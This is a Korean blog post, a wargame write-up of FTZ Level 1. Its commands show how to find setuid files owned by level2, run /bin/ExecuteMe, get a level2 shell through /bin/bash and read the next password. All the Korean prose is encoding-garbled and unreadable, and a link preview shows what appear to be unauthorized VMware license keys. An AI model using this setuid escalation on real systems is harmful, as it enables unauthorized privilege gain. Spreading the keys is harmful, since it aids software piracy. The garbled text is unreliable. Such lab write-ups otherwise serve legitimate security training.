๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
Wargame/System

[FTZ] FTZ Level 01

by STUDY SOOHYUN 2022. 7. 17.
728x90

 

 

[FTZ] FTZ ์‹œ์ž‘ํ•˜๊ธฐ

โœ… Program Download ๐Ÿ“Œ VMware Download VMware Workstation Pro 16 Download ๐Ÿ‘‰๐Ÿป Download VMware Workstation Pro Link VMware Workstation Pro 16 license keys ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-..

alltime-it.tistory.com

 

๐Ÿ‘ค USER : level1

๐Ÿ”’PASSWORD : level1

 

๐Ÿ“Œ ํ˜„์žฌ ๊ฒฝ๋กœ ํ™•์ธ

[level1@ftz level1]$ pwd

/home/level1

 

๐Ÿ“Œ ๋””๋ ‰ํ„ฐ๋ฆฌ ๋ชฉ๋ก ํ™•์ธ

[level1@ftz level1]$ ls -l

total 12
-rw-r--r-- 1 root root 47 Apr 4 2000 hint
drwxr-xr-x 2 root level1 4096 Dec 7 2003 public_html
drwxrwxr-x 2 root level1 4096 Jan 16 2009 tmp

 

๐Ÿ“Œ hint ํŒŒ์ผ ํ™•์ธ

[level1@ftz level1]$ cat hint

level2 ๊ถŒํ•œ์— setuid๊ฐ€ ๊ฑธ๋ฆฐ ํŒŒ์ผ์„ ์ฐพ๋Š”๋‹ค.

 

๐Ÿ“Œ find ๋ช…๋ น์–ด ๋ฐ ์˜ต์…˜ ์ด์šฉ

[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null

/bin/ExecuteMe

๐Ÿ–‡๏ธ - perm → setuid ๊ฑธ๋ ค์žˆ๋Š” ํŒŒ์ผ ์ฐพ๊ธฐ [setuid ๊ฐ€ ๊ฑธ๋ ค์žˆ๋Š” ํŒŒ์ผ์€ 400๋ฒˆ๋Œ€๋กœ ํ‘œ์‹œ]

๐Ÿ–‡๏ธ 2>/dev/null → 2๋ฒˆ์€ ํ‘œ์ค€์—๋Ÿฌ๋ฅผ ๋œปํ•˜๋ฉฐ, ํ‘œ์ค€์—๋Ÿฌ๋ฅผ null๋กœ ๋ฆฌ๋‹ค์ด๋ ‰์…˜

 

 

๐Ÿ“Œ ๊ฒฝ๋กœ์ด๋™ ๋ฐ ํŒŒ์ผ์‹คํ–‰

[level1@ftz level1]$ cd /bin/

[level1@ftz bin]$ pwd
/bin

[level1@ftz bin]$ ./ExecuteMe

 

๐Ÿ“Œ Shell ํš๋“

๋ ˆ๋ฒจ 2์˜ ๊ถŒํ•œ์œผ๋กœ ๋‹น์‹ ์ด ์›ํ•˜๋Š” ๋ช…๋ น์–ด๋ฅผ ํ•œ๊ฐ€์ง€ ์‹คํ–‰์‹œ์ผœ ๋“œ๋ฆฌ๊ฒ ์Šต๋‹ˆ๋‹ค.
(๋‹จ, my-pass ์™€ chmod๋Š” ์ œ์™ธ)
์–ด๋–ค ๋ช…๋ น์„ ์‹คํ–‰์‹œํ‚ค๊ฒ ์Šต๋‹ˆ๊นŒ?

[level2@ftz level2]$ /bin/bash

 

๐Ÿ“Œ Level 02 ๋น„๋ฐ€๋ฒˆํ˜ธ ํš๋“

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

 

 

728x90

'Wargame > System' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[FTZ] FTZ Level 02  (0) 2022.07.17
[FTZ] FTZ ์‹œ์ž‘ํ•˜๊ธฐ  (0) 2022.07.17

๋Œ“๊ธ€